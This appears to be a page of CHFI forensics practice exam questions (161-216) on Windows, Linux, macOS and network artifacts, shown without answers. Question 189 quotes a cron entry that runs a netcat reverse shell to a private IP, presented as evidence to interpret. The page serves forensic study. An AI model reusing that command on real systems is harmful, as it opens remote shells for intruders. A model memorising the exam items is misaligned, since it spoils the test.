Read the full OS and Network Forensics explanation →

In Linux forensics, which file contains user account information including the user ID, group ID, home directory, and default shell?

Question 161mediummultiple choice
Read the full OS and Network Forensics explanation →

An investigator finds a webshell on a compromised web server. Which artifact would be MOST useful to determine what commands were executed through the webshell?

Question 162hardmultiple choice
Read the full NAT/PAT explanation →

During a forensic analysis of a Linux system, the investigator finds that the bash_history file is empty for the root user. However, the system has been used actively. What is the MOST likely explanation?

Question 163mediummulti select
Read the full OS and Network Forensics explanation →

Which TWO Windows Event IDs are associated with successful logon events? (Select two.)

Question 164hardmulti select
Read the full DNS explanation →

A forensic analyst is examining a network packet capture for signs of data exfiltration. Which THREE of the following are common indicators of data exfiltration over DNS? (Select three.)

Question 165mediummulti select
Read the full OS and Network Forensics explanation →

In a Mac forensic investigation, which TWO artifacts are valuable for determining the timeline of file access? (Select two.)

Question 166mediummultiple choice
Read the full OS and Network Forensics explanation →

A security analyst observes multiple Event ID 4625 logon failures for a single user account within a short time frame, followed by Event ID 4624 logon success. Which attack technique is MOST likely indicated?

Question 167hardmultiple choice
Read the full OS and Network Forensics explanation →

During a forensic investigation, you find a prefetch file created at 03:15:22 UTC on the system. The corresponding executable's last modified timestamp is 02:30:00 UTC, and the system date/time shows a discrepancy of +5 minutes. What is the MOST accurate interpretation regarding the file execution time?

Question 168easymultiple choice
Read the full OS and Network Forensics explanation →

Which Windows registry hive stores user-specific configuration and is loaded when a user logs in, containing artifacts such as recently accessed files and application settings?

Question 169mediummultiple choice
Read the full OS and Network Forensics explanation →

A Linux system administrator notices unusual outbound connections from a server. Which log file should be examined FIRST to identify authentication attempts related to the compromised account?

Question 170mediummultiple choice
Read the full OS and Network Forensics explanation →

During a network forensic investigation, an analyst examines a pcap file and finds multiple TCP SYN packets sent to a target IP on port 80, each from a different source IP address. No SYN-ACK packets are returned, but the target continues to send SYN-ACK responses for earlier packets. What attack is MOST likely occurring?

Question 171easymultiple choice
Read the full OS and Network Forensics explanation →

Which tool is specifically designed for timeline analysis of forensic artifacts across multiple systems and can process output from various forensic tools?

Question 172hardmultiple choice
Read the full OS and Network Forensics explanation →

A forensics examiner finds a suspicious entry in the Windows Registry under HKCU\Software\Microsoft\Windows\CurrentVersion\Run pointing to a PowerShell command. Which persistence mechanism does this represent, and what is the MOST likely impact?

Question 173mediummultiple choice
Read the full OS and Network Forensics explanation →

In Mac forensics, which artifact stores system-wide and per-user application preferences, often used to determine configured settings and recently accessed files?

Question 174easymultiple choice
Read the full OS and Network Forensics explanation →

Which Windows Event ID is generated when a new service is installed on the system?

Question 175mediummultiple choice
Read the full OS and Network Forensics explanation →

A forensic analyst is examining a compromised Linux server and finds a suspicious binary running as a service. Which file should be checked to determine if the binary is set to start at boot?

Question 176hardmultiple choice
Read the full DNS explanation →

During a network forensics investigation, an analyst reviews NetFlow data and notices a one-way flow of UDP traffic from an internal host to an external IP on port 53. However, the packet capture shows the external IP responding with large DNS responses. What type of data exfiltration technique is MOST likely being used?

Question 177mediummultiple choice
Read the full OS and Network Forensics explanation →

A forensics investigator finds a suspicious LNK file on a Windows system that points to a script located on a remote share. What is the PRIMARY forensic significance of this LNK file?

Question 178mediummulti select
Read the full OS and Network Forensics explanation →

Which TWO artifacts are commonly used to identify USB device insertion history on a Windows system? (Select TWO.)

Question 179hardmulti select
Read the full OS and Network Forensics explanation →

Which THREE of the following are indicators of a webshell on a compromised web server? (Select THREE.)

Question 180easymulti select
Read the full OS and Network Forensics explanation →

Which TWO of the following are typical sources of evidence for network forensics? (Select TWO.)

Question 181easymultiple choice
Read the full OS and Network Forensics explanation →

A security analyst reviews Windows Security Event Log and notices multiple Event ID 4625 entries for a single user account from various IP addresses within a short time frame. What is the MOST likely attack being attempted?

Question 182mediummultiple choice
Read the full OS and Network Forensics explanation →

During a Linux forensic investigation, you find the following entry in /var/log/auth.log: "Accepted publickey for root from 203.0.113.5 port 54321 ssh2: RSA SHA256:abc...". The user claims they never connect from that IP. Which forensic artifact should you examine next to confirm unauthorized access?

Question 183hardmultiple choice
Read the full OS and Network Forensics explanation →

A forensic analyst examines a Mac system and runs "log show --predicate 'eventMessage contains "disk"' --last 1h" in Terminal. This command extracts Unified Log entries related to disk activity. Which macOS forensic artifact is the analyst MOST likely querying?

Question 184easymultiple choice
Read the full OS and Network Forensics explanation →

In Windows registry forensics, which registry hive contains the SAM database storing local user account hashes?

Question 185mediummultiple choice
Read the full OS and Network Forensics explanation →

A network forensic analyst captures traffic that includes the following Wireshark filter: "tcp.port == 22 and tcp.flags.syn == 1 and tcp.flags.ack == 0". What type of traffic is this filter selecting?

Question 186mediummultiple choice
Read the full OS and Network Forensics explanation →

During a Windows forensic analysis, you find a suspicious LNK file in a user's Recent folder. Which of the following is NOT typically retrievable from an LNK file?

Question 187hardmultiple choice
Read the full OS and Network Forensics explanation →

A forensic tool parses the Windows registry and reveals that a USB device with VID_0781&PID_5583 was last connected on 2023-10-01. Which registry key is the MOST likely source of this information?

Question 188easymultiple choice
Read the full OS and Network Forensics explanation →

Which Linux log file is the primary source for authentication-related events, including SSH login attempts and sudo usage?

Question 189mediummultiple choice
Read the full OS and Network Forensics explanation →

An incident responder finds the following entry in a Linux cron job: "*/5 * * * * root nc -e /bin/sh 10.0.0.5 4444". What is the purpose of this cron job?

Question 190hardmultiple choice
Read the full OS and Network Forensics explanation →

A forensic examiner uses Plaso (log2timeline) to create a timeline from a disk image. Which of the following artifacts would NOT be included in the timeline by default using the 'all' parser?

Question 191mediummultiple choice
Read the full OS and Network Forensics explanation →

In a Windows forensic investigation, which registry key is used to examine programs that automatically start at system boot for all users?

Question 192easymultiple choice
Read the full network assurance explanation →

Which network forensic tool is BEST suited for analyzing NetFlow data to identify top talkers and detect anomalies?

Question 193mediummulti select
Read the full OS and Network Forensics explanation →

A forensic analyst is investigating a Windows system and wants to identify recently executed programs. Which TWO artifacts should the analyst examine?

Question 194hardmulti select
Read the full NAT/PAT explanation →

A security analyst detects suspicious outbound traffic to multiple external IPs on port 443. Which THREE network forensic data sources should be examined to identify the infected host and the nature of the communication?

Question 195mediummulti select
Read the full OS and Network Forensics explanation →

During a macOS forensic investigation, which TWO artifacts would be MOST helpful in determining when a file was downloaded from the internet?

Question 196mediummultiple choice
Read the full NAT/PAT explanation →

A security analyst reviewing Windows Security Event Logs sees multiple Event ID 4625 entries for a single user account, followed by a successful Event ID 4624. The account is a domain administrator. What is the MOST likely explanation?

Question 197hardmultiple choice
Read the full OS and Network Forensics explanation →

During a forensic investigation of a compromised Linux server, you find the following entry in /var/log/auth.log: 'Mar 10 02:15:30 server sshd[1234]: Failed password for root from 10.0.0.5 port 54321 ssh2'. Which command would you use to extract all failed root login attempts from this log?

Question 198mediummultiple choice
Read the full OS and Network Forensics explanation →

An investigator is analyzing a Windows 10 system suspected of malware persistence. Which registry key is commonly used by malware to achieve persistence by running a program at every user logon?

Question 199easymultiple choice
Read the full OS and Network Forensics explanation →

In network forensics, which tool is specifically designed for packet capture and analysis, allowing examiners to inspect individual packets and reconstruct network conversations?

Question 200mediummultiple choice
Read the full NAT/PAT explanation →

During a forensic examination of a Mac system, an investigator needs to recover historical record of file system events, such as file modifications and deletions. Which artifact should they examine?

Question 201hardmultiple choice
Read the full OS and Network Forensics explanation →

An analyst is examining a PCAP file in Wireshark and notices a series of TCP SYN packets sent to multiple ports on a single IP address, with no subsequent SYN-ACK replies. What type of network activity does this indicate?

Question 202mediummulti select
Read the full NAT/PAT explanation →

Which TWO of the following are Windows artifacts that can provide evidence of file execution, including timestamps and paths?

Question 203hardmulti select
Read the full OS and Network Forensics explanation →

Which TWO of the following registry keys are commonly used to maintain persistence on Windows systems by automatically starting programs?

Question 204easymulti select
Read the full OS and Network Forensics explanation →

Which TWO of the following are common Linux log files that can be used for forensic analysis?

Question 205mediummulti select
Read the full OS and Network Forensics explanation →

Which TWO of the following are forensic artifacts found on macOS systems that can help reconstruct user activity?

Question 206hardmulti select
Read the full OS and Network Forensics explanation →

Which THREE of the following are indicators of a webshell compromise on a web server?

Question 207mediummulti select
Read the full OS and Network Forensics explanation →

Which THREE of the following are Windows Event IDs that are particularly useful for investigating account logon activities?

Question 208mediummulti select
Read the full OS and Network Forensics explanation →

Which THREE of the following are commonly used network forensic data sources?

Question 209easymulti select
Read the full OS and Network Forensics explanation →

Which TWO of the following are tools that can be used for timeline analysis in digital forensics?

Question 210hardmulti select
Read the full OS and Network Forensics explanation →

Which THREE of the following are persistence mechanisms that can be used on Linux systems?

Question 211easymulti select
Read the full OS and Network Forensics explanation →

A forensic analyst reviews a Windows system for signs of malware persistence. Which TWO registry locations are commonly used to achieve persistence via auto-start programs?

Question 212mediummulti select
Read the full OS and Network Forensics explanation →

During a Linux forensic investigation, an analyst examines the file /var/log/auth.log and finds repeated entries with 'Failed password for root from 192.168.1.200 port 22 ssh2'. Which TWO conclusions can the analyst draw from this evidence?

Question 213hardmulti select
Read the full OS and Network Forensics explanation →

A security analyst captures network traffic and observes multiple TCP SYN packets sent to a range of IP addresses on port 445, followed by TCP RST packets after 15 seconds. Which THREE indicators suggest this is a network scan?

Question 214easymulti select
Read the full OS and Network Forensics explanation →

During a Windows forensic investigation, an analyst finds prefetch files with the .pf extension. Which TWO pieces of information can the analyst obtain from analyzing prefetch files?

Question 215mediummulti select
Read the full OS and Network Forensics explanation →

A forensic analyst is examining a Mac system for evidence of malicious activity. Which THREE artifacts are commonly analyzed in macOS forensics?

Question 216hardmulti select
Read the full DNS explanation →

A network security analyst reviews firewall logs and identifies a high volume of outbound DNS queries to a known malicious domain from multiple internal hosts. Which THREE actions should the analyst take immediately?

Practice tests

Scored 10-question sessions with instant feedback and explanations.

CHFI Practice Test 1 — 10 Questions→CHFI Practice Test 2 — 10 Questions→CHFI Practice Test 3 — 10 Questions→CHFI Practice Test 4 — 10 Questions→CHFI Practice Test 5 — 10 Questions→CHFI Practice Exam 1 — 20 Questions→CHFI Practice Exam 2 — 20 Questions→CHFI Practice Exam 3 — 20 Questions→CHFI Practice Exam 4 — 20 Questions→Free CHFI Practice Test 1 — 30 Questions→Free CHFI Practice Test 2 — 30 Questions→Free CHFI Practice Test 3 — 30 Questions→CHFI Practice Questions 1 — 50 Questions→CHFI Practice Questions 2 — 50 Questions→CHFI Exam Simulation 1 — 100 Questions→

Practice by domain

Each domain maps to a weighted exam section. Focus on the domain where you are weakest.

Computer Forensics Investigation ProcessComputer Forensics Fundamentals and ProcessStorage Forensics and File System AnalysisIncident Response and First Responder SkillsComputer Forensics LabEvidence Acquisition and DuplicationOS and Network ForensicsOS and File System ForensicsApplication, Email and Cloud ForensicsMobile and Malware ForensicsNetwork and Cloud ForensicsDatabase and Application ForensicsMalware Forensics

Practice by scenario

Filter questions by type — troubleshooting, exhibit, drag-and-drop, PBQ, ACLs, OSPF, and more.

Browse scenarios→

Continue studying

All OS and Network Forensics setsAll OS and Network Forensics questionsCHFI Practice Hub